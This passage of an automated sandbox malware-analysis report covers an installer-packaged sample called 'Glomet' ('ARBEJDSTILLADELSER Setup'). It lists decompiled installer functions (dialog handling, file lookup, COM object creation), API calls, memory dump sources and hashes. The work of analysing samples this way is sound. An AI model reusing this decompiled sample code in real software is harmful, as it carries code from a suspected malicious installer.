                                                                                                                                                                              				 *0x42f4a8 =  *0x42f4a8 +  *((intOrPtr*)(_t111 - 4));
                                                                                                                                                                              				return 0;
                                                                                                                                                                              			}























                                                                                                                                                                              APIs
                                                                                                                                                                              • CoCreateInstance.OLE32(00408524,?,00000001,00408514,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004021F8
                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,00408514,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004022AA
                                                                                                                                                                              Strings
                                                                                                                                                                              • C:\Users\user\Pictures\Cellekammeraten\PRVEBALLONS\Omstigningens\Lektionskatalogets1, xrefs: 00402238
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000001D.00000002.575890944.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 0000001D.00000002.575844664.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.576063119.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.576133488.000000000040A000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577041699.000000000042C000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577174379.0000000000431000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577257988.0000000000435000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577403934.0000000000446000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577502312.0000000000448000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_29_2_400000_Glomet.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ByteCharCreateInstanceMultiWide
                                                                                                                                                                              • String ID: C:\Users\user\Pictures\Cellekammeraten\PRVEBALLONS\Omstigningens\Lektionskatalogets1
                                                                                                                                                                              • API String ID: 123533781-3951930202
                                                                                                                                                                              • Opcode ID: 21f73c3ba2152935eaac52a2a5d6e0315d6d795d70bf2892212c7e8f7ea2f8ce
                                                                                                                                                                              • Instruction ID: ec6a4b66970030f98d0c357d5daeebd90ed2a1685bb0ce4afdd26a2e8d50d7fb
                                                                                                                                                                              • Opcode Fuzzy Hash: 21f73c3ba2152935eaac52a2a5d6e0315d6d795d70bf2892212c7e8f7ea2f8ce
                                                                                                                                                                              • Instruction Fuzzy Hash: 68511675A00208BFDF10DFE4C988A9D7BB6AF48314F2045AAF505EB2D1DA799981CB54
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                              			E004065CE(CHAR* _a4) {
                                                                                                                                                                              				void* _t2;
                                                                                                                                                                              
                                                                                                                                                                              				_t2 = FindFirstFileA(_a4, 0x42c0e0); // executed
                                                                                                                                                                              				if(_t2 == 0xffffffff) {
                                                                                                                                                                              					return 0;
                                                                                                                                                                              				}
                                                                                                                                                                              				FindClose(_t2);
                                                                                                                                                                              				return 0x42c0e0;
                                                                                                                                                                              			}





                                                                                                                                                                              APIs
                                                                                                                                                                              • FindFirstFileA.KERNELBASE(7620FA90,0042C0E0,0042BC98,00405D1A,0042BC98,0042BC98,00000000,0042BC98,0042BC98,7620FA90,?,C:\Users\user\AppData\Local\Temp\,00405A39,?,7620FA90,C:\Users\user\AppData\Local\Temp\), ref: 004065D9
                                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 004065E5
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000001D.00000002.575890944.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 0000001D.00000002.575844664.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.576063119.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.576133488.000000000040A000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577041699.000000000042C000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577174379.0000000000431000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577257988.0000000000435000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577403934.0000000000446000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577502312.0000000000448000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_29_2_400000_Glomet.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Find$CloseFileFirst
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2295610775-0
                                                                                                                                                                              • Opcode ID: 834111d6c5cf34f6f1a5acdd2360b111687db49f4aa82fd60f9155d80f0d726b
                                                                                                                                                                              • Instruction ID: 8216c8ff522cab9e5c4fbd2006c0822adf2a7579a10bfa080a6703c422ecd414
                                                                                                                                                                              • Opcode Fuzzy Hash: 834111d6c5cf34f6f1a5acdd2360b111687db49f4aa82fd60f9155d80f0d726b
                                                                                                                                                                              • Instruction Fuzzy Hash: 66D01231504520EBC7515B78BD0CC4B7A589F053313218A36F466F22E4CB34CC22A6DC
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              C-Code - Quality: 84%
                                                                                                                                                                              			E00403DDA(struct HWND__* _a4, intOrPtr _a8, int _a12, long _a16) {
                                                                                                                                                                              				struct HWND__* _v28;
                                                                                                                                                                              				void* _v84;
                                                                                                                                                                              				void* _v88;
                                                                                                                                                                              				void* __ebx;
                                                                                                                                                                              				void* __edi;
                                                                                                                                                                              				void* __esi;
                                                                                                                                                                              				signed int _t32;
                                                                                                                                                                              				signed int _t34;
                                                                                                                                                                              				signed int _t36;
                                                                                                                                                                              				struct HWND__* _t46;
                                                                                                                                                                              				signed int _t65;
                                                                                                                                                                              				struct HWND__* _t71;
                                                                                                                                                                              				signed int _t84;
                                                                                                                                                                              				struct HWND__* _t89;
                                                                                                                                                                              				signed int _t97;
                                                                                                                                                                              				int _t101;
                                                                                                                                                                              				signed int _t115;
                                                                                                                                                                              				int _t116;
                                                                                                                                                                              				int _t120;
                                                                                                                                                                              				signed int _t122;
                                                                                                                                                                              				struct HWND__* _t125;
                                                                                                                                                                              				struct HWND__* _t126;
                                                                                                                                                                              				int _t127;
                                                                                                                                                                              				intOrPtr _t128;
                                                                                                                                                                              				long _t131;
                                                                                                                                                                              				int _t133;
                                                                                                                                                                              				int _t134;
                                                                                                                                                                              				void* _t135;
                                                                                                                                                                              				void* _t144;
                                                                                                                                                                              
                                                                                                                                                                              				_t128 = _a8;
                                                                                                                                                                              				if(_t128 == 0x110 || _t128 == 0x408) {
                                                                                                                                                                              					_t32 = _a12;
                                                                                                                                                                              					_t125 = _a4;
                                                                                                                                                                              					__eflags = _t128 - 0x110;
                                                                                                                                                                              					 *0x42a878 = _t32;
                                                                                                                                                                              					if(_t128 == 0x110) {
                                                                                                                                                                              						 *0x42f428 = _t125;
                                                                                                                                                                              						 *0x42a88c = GetDlgItem(_t125, 1);
                                                                                                                                                                              						_t89 = GetDlgItem(_t125, 2);
                                                                                                                                                                              						_push(0xffffffff);
                                                                                                                                                                              						_push(0x1c);
                                                                                                                                                                              						 *0x429858 = _t89;
                                                                                                                                                                              						E004042D4(_t125);
                                                                                                                                                                              						SetClassLongA(_t125, 0xfffffff2,  *0x42ec08); // executed
                                                                                                                                                                              						 *0x42ebec = E0040140B(4);
                                                                                                                                                                              						_t32 = 1;
                                                                                                                                                                              						__eflags = 1;
                                                                                                                                                                              						 *0x42a878 = 1;
                                                                                                                                                                              					}
                                                                                                                                                                              					_t122 =  *0x40a1dc; // 0x0
                                                                                                                                                                              					_t134 = 0;
                                                                                                                                                                              					_t131 = (_t122 << 6) +  *0x42f440;
                                                                                                                                                                              					__eflags = _t122;
                                                                                                                                                                              					if(_t122 < 0) {
                                                                                                                                                                              						L36:
                                                                                                                                                                              						E00404320(0x40b);
                                                                                                                                                                              						while(1) {
                                                                                                                                                                              							_t34 =  *0x42a878; // 0x1
                                                                                                                                                                              							 *0x40a1dc =  *0x40a1dc + _t34;
                                                                                                                                                                              							_t131 = _t131 + (_t34 << 6);
                                                                                                                                                                              							_t36 =  *0x40a1dc; // 0x0
                                                                                                                                                                              							__eflags = _t36 -  *0x42f444;
                                                                                                                                                                              							if(_t36 ==  *0x42f444) {
                                                                                                                                                                              								E0040140B(1);
                                                                                                                                                                              							}
                                                                                                                                                                              							__eflags =  *0x42ebec - _t134; // 0x0
                                                                                                                                                                              							if(__eflags != 0) {
                                                                                                                                                                              								break;
                                                                                                                                                                              							}
                                                                                                                                                                              							__eflags =  *0x40a1dc -  *0x42f444; // 0x0
                                                                                                                                                                              							if(__eflags >= 0) {
                                                                                                                                                                              								break;
                                                                                                                                                                              							}
                                                                                                                                                                              							_t115 =  *(_t131 + 0x14);
                                                                                                                                                                              							E004062EA(_t115, _t125, _t131, 0x437800,  *((intOrPtr*)(_t131 + 0x24)));
                                                                                                                                                                              							_push( *((intOrPtr*)(_t131 + 0x20)));
                                                                                                                                                                              							_push(0xfffffc19);
                                                                                                                                                                              							E004042D4(_t125);
                                                                                                                                                                              							_push( *((intOrPtr*)(_t131 + 0x1c)));
                                                                                                                                                                              							_push(0xfffffc1b);
                                                                                                                                                                              							E004042D4(_t125);
                                                                                                                                                                              							_push( *((intOrPtr*)(_t131 + 0x28)));
                                                                                                                                                                              							_push(0xfffffc1a);
                                                                                                                                                                              							E004042D4(_t125);
                                                                                                                                                                              							_t46 = GetDlgItem(_t125, 3);
                                                                                                                                                                              							__eflags =  *0x42f4ac - _t134;
                                                                                                                                                                              							_v28 = _t46;
                                                                                                                                                                              							if( *0x42f4ac != _t134) {
                                                                                                                                                                              								_t115 = _t115 & 0x0000fefd | 0x00000004;
                                                                                                                                                                              								__eflags = _t115;
                                                                                                                                                                              							}
                                                                                                                                                                              							ShowWindow(_t46, _t115 & 0x00000008); // executed
                                                                                                                                                                              							EnableWindow( *(_t135 + 0x34), _t115 & 0x00000100); // executed
                                                                                                                                                                              							E004042F6(_t115 & 0x00000002);
                                                                                                                                                                              							_t116 = _t115 & 0x00000004;
                                                                                                                                                                              							EnableWindow( *0x429858, _t116);
                                                                                                                                                                              							__eflags = _t116 - _t134;
                                                                                                                                                                              							if(_t116 == _t134) {
                                                                                                                                                                              								_push(1);
                                                                                                                                                                              							} else {
                                                                                                                                                                              								_push(_t134);
                                                                                                                                                                              							}
                                                                                                                                                                              							EnableMenuItem(GetSystemMenu(_t125, _t134), 0xf060, ??);
                                                                                                                                                                              							SendMessageA( *(_t135 + 0x3c), 0xf4, _t134, 1);
                                                                                                                                                                              							__eflags =  *0x42f4ac - _t134;
                                                                                                                                                                              							if( *0x42f4ac == _t134) {
                                                                                                                                                                              								_push( *0x42a88c);
                                                                                                                                                                              							} else {
                                                                                                                                                                              								SendMessageA(_t125, 0x401, 2, _t134);
                                                                                                                                                                              								_push( *0x429858);
                                                                                                                                                                              							}
                                                                                                                                                                              							E00404309();
                                                                                                                                                                              							E00406257(0x42a890, E00403DBB());
                                                                                                                                                                              							E004062EA(0x42a890, _t125, _t131,  &(0x42a890[lstrlenA(0x42a890)]),  *((intOrPtr*)(_t131 + 0x18)));
                                                                                                                                                                              							SetWindowTextA(_t125, 0x42a890); // executed
                                                                                                                                                                              							_push(_t134);
                                                                                                                                                                              							_t65 = E00401389( *((intOrPtr*)(_t131 + 8)));
                                                                                                                                                                              							__eflags = _t65;
                                                                                                                                                                              							if(_t65 != 0) {
                                                                                                                                                                              								continue;
                                                                                                                                                                              							} else {
                                                                                                                                                                              								__eflags =  *_t131 - _t134;
                                                                                                                                                                              								if( *_t131 == _t134) {
                                                                                                                                                                              									continue;
                                                                                                                                                                              								}
                                                                                                                                                                              								__eflags =  *(_t131 + 4) - 5;
                                                                                                                                                                              								if( *(_t131 + 4) != 5) {
                                                                                                                                                                              									DestroyWindow( *0x42ebf8); // executed
                                                                                                                                                                              									 *0x42a068 = _t131;
                                                                                                                                                                              									__eflags =  *_t131 - _t134;
                                                                                                                                                                              									if( *_t131 <= _t134) {
                                                                                                                                                                              										goto L60;
                                                                                                                                                                              									}
                                                                                                                                                                              									_t71 = CreateDialogParamA( *0x42f420,  *_t131 +  *0x42ec00 & 0x0000ffff, _t125,  *( *(_t131 + 4) * 4 + "?D@"), _t131); // executed
                                                                                                                                                                              									__eflags = _t71 - _t134;
                                                                                                                                                                              									 *0x42ebf8 = _t71;
                                                                                                                                                                              									if(_t71 == _t134) {
                                                                                                                                                                              										goto L60;
                                                                                                                                                                              									}
                                                                                                                                                                              									_push( *((intOrPtr*)(_t131 + 0x2c)));
                                                                                                                                                                              									_push(6);
                                                                                                                                                                              									E004042D4(_t71);
                                                                                                                                                                              									GetWindowRect(GetDlgItem(_t125, 0x3fa), _t135 + 0x10);
                                                                                                                                                                              									ScreenToClient(_t125, _t135 + 0x10);
                                                                                                                                                                              									SetWindowPos( *0x42ebf8, _t134,  *(_t135 + 0x20),  *(_t135 + 0x20), _t134, _t134, 0x15);
                                                                                                                                                                              									_push(_t134);
                                                                                                                                                                              									E00401389( *((intOrPtr*)(_t131 + 0xc)));
                                                                                                                                                                              									__eflags =  *0x42ebec - _t134; // 0x0
                                                                                                                                                                              									if(__eflags != 0) {
                                                                                                                                                                              										goto L63;
                                                                                                                                                                              									}
                                                                                                                                                                              									ShowWindow( *0x42ebf8, 8); // executed
                                                                                                                                                                              									E00404320(0x405);
                                                                                                                                                                              									goto L60;
                                                                                                                                                                              								}
                                                                                                                                                                              								__eflags =  *0x42f4ac - _t134;
                                                                                                                                                                              								if( *0x42f4ac != _t134) {
                                                                                                                                                                              									goto L63;
                                                                                                                                                                              								}
                                                                                                                                                                              								__eflags =  *0x42f4a0 - _t134;
                                                                                                                                                                              								if( *0x42f4a0 != _t134) {
                                                                                                                                                                              									continue;
                                                                                                                                                                              								}
                                                                                                                                                                              								goto L63;
                                                                                                                                                                              							}
                                                                                                                                                                              						}
                                                                                                                                                                              						DestroyWindow( *0x42ebf8);
                                                                                                                                                                              						 *0x42f428 = _t134;
                                                                                                                                                                              						EndDialog(_t125,  *0x429c60);
                                                                                                                                                                              						goto L60;
                                                                                                                                                                              					} else {
                                                                                                                                                                              						__eflags = _t32 - 1;
                                                                                                                                                                              						if(_t32 != 1) {
                                                                                                                                                                              							L35:
                                                                                                                                                                              							__eflags =  *_t131 - _t134;
                                                                                                                                                                              							if( *_t131 == _t134) {
                                                                                                                                                                              								goto L63;
                                                                                                                                                                              							}
                                                                                                                                                                              							goto L36;
                                                                                                                                                                              						}
                                                                                                                                                                              						_push(0);
                                                                                                                                                                              						_t84 = E00401389( *((intOrPtr*)(_t131 + 0x10)));
                                                                                                                                                                              						__eflags = _t84;
                                                                                                                                                                              						if(_t84 == 0) {
                                                                                                                                                                              							goto L35;
                                                                                                                                                                              						}
                                                                                                                                                                              						SendMessageA( *0x42ebf8, 0x40f, 0, 1);
                                                                                                                                                                              						__eflags =  *0x42ebec - _t134; // 0x0
                                                                                                                                                                              						return 0 | __eflags == 0x00000000;
                                                                                                                                                                              					}
                                                                                                                                                                              				} else {
                                                                                                                                                                              					_t125 = _a4;
                                                                                                                                                                              					_t134 = 0;
                                                                                                                                                                              					if(_t128 == 0x47) {
                                                                                                                                                                              						SetWindowPos( *0x42a870, _t125, 0, 0, 0, 0, 0x13);
                                                                                                                                                                              					}
                                                                                                                                                                              					_t120 = _a12;
                                                                                                                                                                              					if(_t128 != 5) {
                                                                                                                                                                              						L8:
                                                                                                                                                                              						if(_t128 != 0x40d) {
                                                                                                                                                                              							__eflags = _t128 - 0x11;
                                                                                                                                                                              							if(_t128 != 0x11) {
                                                                                                                                                                              								__eflags = _t128 - 0x111;
                                                                                                                                                                              								if(_t128 != 0x111) {
                                                                                                                                                                              									L28:
                                                                                                                                                                              									return E0040433B(_a8, _t120, _a16);
                                                                                                                                                                              								}
                                                                                                                                                                              								_t133 = _t120 & 0x0000ffff;
                                                                                                                                                                              								_t126 = GetDlgItem(_t125, _t133);
                                                                                                                                                                              								__eflags = _t126 - _t134;
                                                                                                                                                                              								if(_t126 == _t134) {
                                                                                                                                                                              									L15:
                                                                                                                                                                              									__eflags = _t133 - 1;
                                                                                                                                                                              									if(_t133 != 1) {
                                                                                                                                                                              										__eflags = _t133 - 3;
                                                                                                                                                                              										if(_t133 != 3) {
                                                                                                                                                                              											_t127 = 2;
                                                                                                                                                                              											__eflags = _t133 - _t127;
                                                                                                                                                                              											if(_t133 != _t127) {
                                                                                                                                                                              												L27:
                                                                                                                                                                              												SendMessageA( *0x42ebf8, 0x111, _t120, _a16);
                                                                                                                                                                              												goto L28;
                                                                                                                                                                              											}
                                                                                                                                                                              											__eflags =  *0x42f4ac - _t134;
                                                                                                                                                                              											if( *0x42f4ac == _t134) {
                                                                                                                                                                              												_t97 = E0040140B(3);
                                                                                                                                                                              												__eflags = _t97;
                                                                                                                                                                              												if(_t97 != 0) {
                                                                                                                                                                              													goto L28;
                                                                                                                                                                              												}
                                                                                                                                                                              												 *0x429c60 = 1;
                                                                                                                                                                              												L23:
                                                                                                                                                                              												_push(0x78);
                                                                                                                                                                              												L24:
                                                                                                                                                                              												E004042AD();
                                                                                                                                                                              												goto L28;
                                                                                                                                                                              											}
                                                                                                                                                                              											E0040140B(_t127);
                                                                                                                                                                              											 *0x429c60 = _t127;
                                                                                                                                                                              											goto L23;
                                                                                                                                                                              										}
                                                                                                                                                                              										__eflags =  *0x40a1dc - _t134; // 0x0
                                                                                                                                                                              										if(__eflags <= 0) {
                                                                                                                                                                              											goto L27;
                                                                                                                                                                              										}
                                                                                                                                                                              										_push(0xffffffff);
                                                                                                                                                                              										goto L24;
                                                                                                                                                                              									}
                                                                                                                                                                              									_push(_t133);
                                                                                                                                                                              									goto L24;
                                                                                                                                                                              								}
                                                                                                                                                                              								SendMessageA(_t126, 0xf3, _t134, _t134);
                                                                                                                                                                              								_t101 = IsWindowEnabled(_t126);
                                                                                                                                                                              								__eflags = _t101;
                                                                                                                                                                              								if(_t101 == 0) {
                                                                                                                                                                              									L63:
                                                                                                                                                                              									return 0;
                                                                                                                                                                              								}
                                                                                                                                                                              								goto L15;
                                                                                                                                                                              							}
                                                                                                                                                                              							SetWindowLongA(_t125, _t134, _t134);
                                                                                                                                                                              							return 1;
                                                                                                                                                                              						}
                                                                                                                                                                              						DestroyWindow( *0x42ebf8);
                                                                                                                                                                              						 *0x42ebf8 = _t120;
                                                                                                                                                                              						L60:
                                                                                                                                                                              						if( *0x42b890 == _t134) {
                                                                                                                                                                              							_t144 =  *0x42ebf8 - _t134; // 0x5001c
                                                                                                                                                                              							if(_t144 != 0) {
                                                                                                                                                                              								ShowWindow(_t125, 0xa); // executed
                                                                                                                                                                              								 *0x42b890 = 1;
                                                                                                                                                                              							}
                                                                                                                                                                              						}
                                                                                                                                                                              						goto L63;
                                                                                                                                                                              					}
                                                                                                                                                                              					asm("sbb eax, eax");
                                                                                                                                                                              					ShowWindow( *0x42a870,  ~(_t120 - 1) & 0x00000005);
                                                                                                                                                                              					if(_t120 != 2 || (GetWindowLongA(_t125, 0xfffffff0) & 0x21010000) != 0x1000000) {
                                                                                                                                                                              						goto L28;
                                                                                                                                                                              					} else {
                                                                                                                                                                              						ShowWindow(_t125, 4);
                                                                                                                                                                              						goto L8;
                                                                                                                                                                              					}
                                                                                                                                                                              				}
                                                                                                                                                                              			}
                                                                                                                                                                              0x00403f84
                                                                                                                                                                              0x00403f89
                                                                                                                                                                              0x00403f97
                                                                                                                                                                              0x00403fa4
                                                                                                                                                                              0x00403fab
                                                                                                                                                                              0x00403fab
                                                                                                                                                                              0x00403fac
                                                                                                                                                                              0x00403fac
                                                                                                                                                                              0x00403fb1
                                                                                                                                                                              0x00403fb7
                                                                                                                                                                              0x00403fbe
                                                                                                                                                                              0x00403fc4
                                                                                                                                                                              0x00403fc6
                                                                                                                                                                              0x00404006
                                                                                                                                                                              0x0040400b
                                                                                                                                                                              0x00404010
                                                                                                                                                                              0x00404010
                                                                                                                                                                              0x00404015
                                                                                                                                                                              0x0040401e
                                                                                                                                                                              0x00404020
                                                                                                                                                                              0x00404025
                                                                                                                                                                              0x0040402b
                                                                                                                                                                              0x0040402f
                                                                                                                                                                              0x0040402f
                                                                                                                                                                              0x00404034
                                                                                                                                                                              0x0040403a
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00404045
                                                                                                                                                                              0x0040404b
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00404054
                                                                                                                                                                              0x0040405c
                                                                                                                                                                              0x00404061
                                                                                                                                                                              0x00404064
                                                                                                                                                                              0x0040406a
                                                                                                                                                                              0x0040406f
                                                                                                                                                                              0x00404072
                                                                                                                                                                              0x00404078
                                                                                                                                                                              0x0040407d
                                                                                                                                                                              0x00404080
                                                                                                                                                                              0x00404086
                                                                                                                                                                              0x0040408e
                                                                                                                                                                              0x00404094
                                                                                                                                                                              0x0040409a
                                                                                                                                                                              0x0040409e
                                                                                                                                                                              0x004040a5
                                                                                                                                                                              0x004040a5
                                                                                                                                                                              0x004040a5
                                                                                                                                                                              0x004040af
                                                                                                                                                                              0x004040c1
                                                                                                                                                                              0x004040cd
                                                                                                                                                                              0x004040d2
                                                                                                                                                                              0x004040dc
                                                                                                                                                                              0x004040e2
                                                                                                                                                                              0x004040e4
                                                                                                                                                                              0x004040e9
                                                                                                                                                                              0x004040e6
                                                                                                                                                                              0x004040e6
                                                                                                                                                                              0x004040e6
                                                                                                                                                                              0x004040f9
                                                                                                                                                                              0x00404111
                                                                                                                                                                              0x00404113
                                                                                                                                                                              0x00404119
                                                                                                                                                                              0x0040412e
                                                                                                                                                                              0x0040411b
                                                                                                                                                                              0x00404124
                                                                                                                                                                              0x00404126
                                                                                                                                                                              0x00404126
                                                                                                                                                                              0x00404134
                                                                                                                                                                              0x00404145
                                                                                                                                                                              0x00404156
                                                                                                                                                                              0x0040415d
                                                                                                                                                                              0x00404163
                                                                                                                                                                              0x00404167
                                                                                                                                                                              0x0040416c
                                                                                                                                                                              0x0040416e
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00404174
                                                                                                                                                                              0x00404174
                                                                                                                                                                              0x00404176
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x0040417c
                                                                                                                                                                              0x00404180
                                                                                                                                                                              0x004041a5
                                                                                                                                                                              0x004041ab
                                                                                                                                                                              0x004041b1
                                                                                                                                                                              0x004041b3
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x004041d9
                                                                                                                                                                              0x004041df
                                                                                                                                                                              0x004041e1
                                                                                                                                                                              0x004041e6
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x004041ec
                                                                                                                                                                              0x004041ef
                                                                                                                                                                              0x004041f2
                                                                                                                                                                              0x00404209
                                                                                                                                                                              0x00404215
                                                                                                                                                                              0x0040422e
                                                                                                                                                                              0x00404234
                                                                                                                                                                              0x00404238
                                                                                                                                                                              0x0040423d
                                                                                                                                                                              0x00404243
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x0040424d
                                                                                                                                                                              0x00404258
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00404258
                                                                                                                                                                              0x00404182
                                                                                                                                                                              0x00404188
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x0040418e
                                                                                                                                                                              0x00404194
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x0040419a
                                                                                                                                                                              0x0040416e
                                                                                                                                                                              0x00404265
                                                                                                                                                                              0x00404271
                                                                                                                                                                              0x00404278
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00403fc8
                                                                                                                                                                              0x00403fc8
                                                                                                                                                                              0x00403fcb
                                                                                                                                                                              0x00403ffe
                                                                                                                                                                              0x00403ffe
                                                                                                                                                                              0x00404000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00404000
                                                                                                                                                                              0x00403fcd
                                                                                                                                                                              0x00403fd1
                                                                                                                                                                              0x00403fd6
                                                                                                                                                                              0x00403fd8
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00403fe8
                                                                                                                                                                              0x00403ff0
                                                                                                                                                                              0x00000000
                                                                                                                                                                              0x00403ff6
                                                                                                                                                                              0x00403dfe
                                                                                                                                                                              0x00403dfe

                                                                                                                                                                              APIs
                                                                                                                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403E16
                                                                                                                                                                              • ShowWindow.USER32(?), ref: 00403E36
                                                                                                                                                                              • GetWindowLongA.USER32 ref: 00403E48
                                                                                                                                                                              • ShowWindow.USER32(?,00000004), ref: 00403E61
                                                                                                                                                                              • DestroyWindow.USER32 ref: 00403E75
                                                                                                                                                                              • SetWindowLongA.USER32 ref: 00403E8E
                                                                                                                                                                              • GetDlgItem.USER32 ref: 00403EAD
                                                                                                                                                                              • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403EC1
                                                                                                                                                                              • IsWindowEnabled.USER32(00000000), ref: 00403EC8
                                                                                                                                                                              • GetDlgItem.USER32 ref: 00403F73
                                                                                                                                                                              • GetDlgItem.USER32 ref: 00403F7D
                                                                                                                                                                              • KiUserCallbackDispatcher.NTDLL(?,000000F2,?,0000001C,000000FF), ref: 00403F97
                                                                                                                                                                              • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403FE8
                                                                                                                                                                              • GetDlgItem.USER32 ref: 0040408E
                                                                                                                                                                              • ShowWindow.USER32(00000000,?), ref: 004040AF
                                                                                                                                                                              • KiUserCallbackDispatcher.NTDLL(?,?), ref: 004040C1
                                                                                                                                                                              • EnableWindow.USER32(?,?), ref: 004040DC
                                                                                                                                                                              • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004040F2
                                                                                                                                                                              • EnableMenuItem.USER32 ref: 004040F9
                                                                                                                                                                              • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00404111
                                                                                                                                                                              • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00404124
                                                                                                                                                                              • lstrlenA.KERNEL32(ARBEJDSTILLADELSER Setup: Installing,?,ARBEJDSTILLADELSER Setup: Installing,00000000), ref: 0040414E
                                                                                                                                                                              • SetWindowTextA.USER32(?,ARBEJDSTILLADELSER Setup: Installing), ref: 0040415D
                                                                                                                                                                              • ShowWindow.USER32(?,0000000A), ref: 00404291
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000001D.00000002.575890944.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 0000001D.00000002.575844664.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.576063119.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.576133488.000000000040A000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577041699.000000000042C000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577174379.0000000000431000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577257988.0000000000435000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577403934.0000000000446000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577502312.0000000000448000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_29_2_400000_Glomet.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Window$Item$MessageSendShow$CallbackDispatcherEnableLongMenuUser$DestroyEnabledSystemTextlstrlen
                                                                                                                                                                              • String ID: ARBEJDSTILLADELSER Setup: Installing
                                                                                                                                                                              • API String ID: 3618520773-1892138075
                                                                                                                                                                              • Opcode ID: 127d2bede9c928d446a527d2bae20013705ae04109f31a2289bd5e7c7bb7a3e0
                                                                                                                                                                              • Instruction ID: f21371ea752dfce5ee3d4a80c6152a791402a2454a60405a922b397e1036299a
                                                                                                                                                                              • Opcode Fuzzy Hash: 127d2bede9c928d446a527d2bae20013705ae04109f31a2289bd5e7c7bb7a3e0
                                                                                                                                                                              • Instruction Fuzzy Hash: C1C1E5B1A00205AFDB207F62ED45E2B3A78EB85745F41053EF641B51F0CB799852DB2D
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

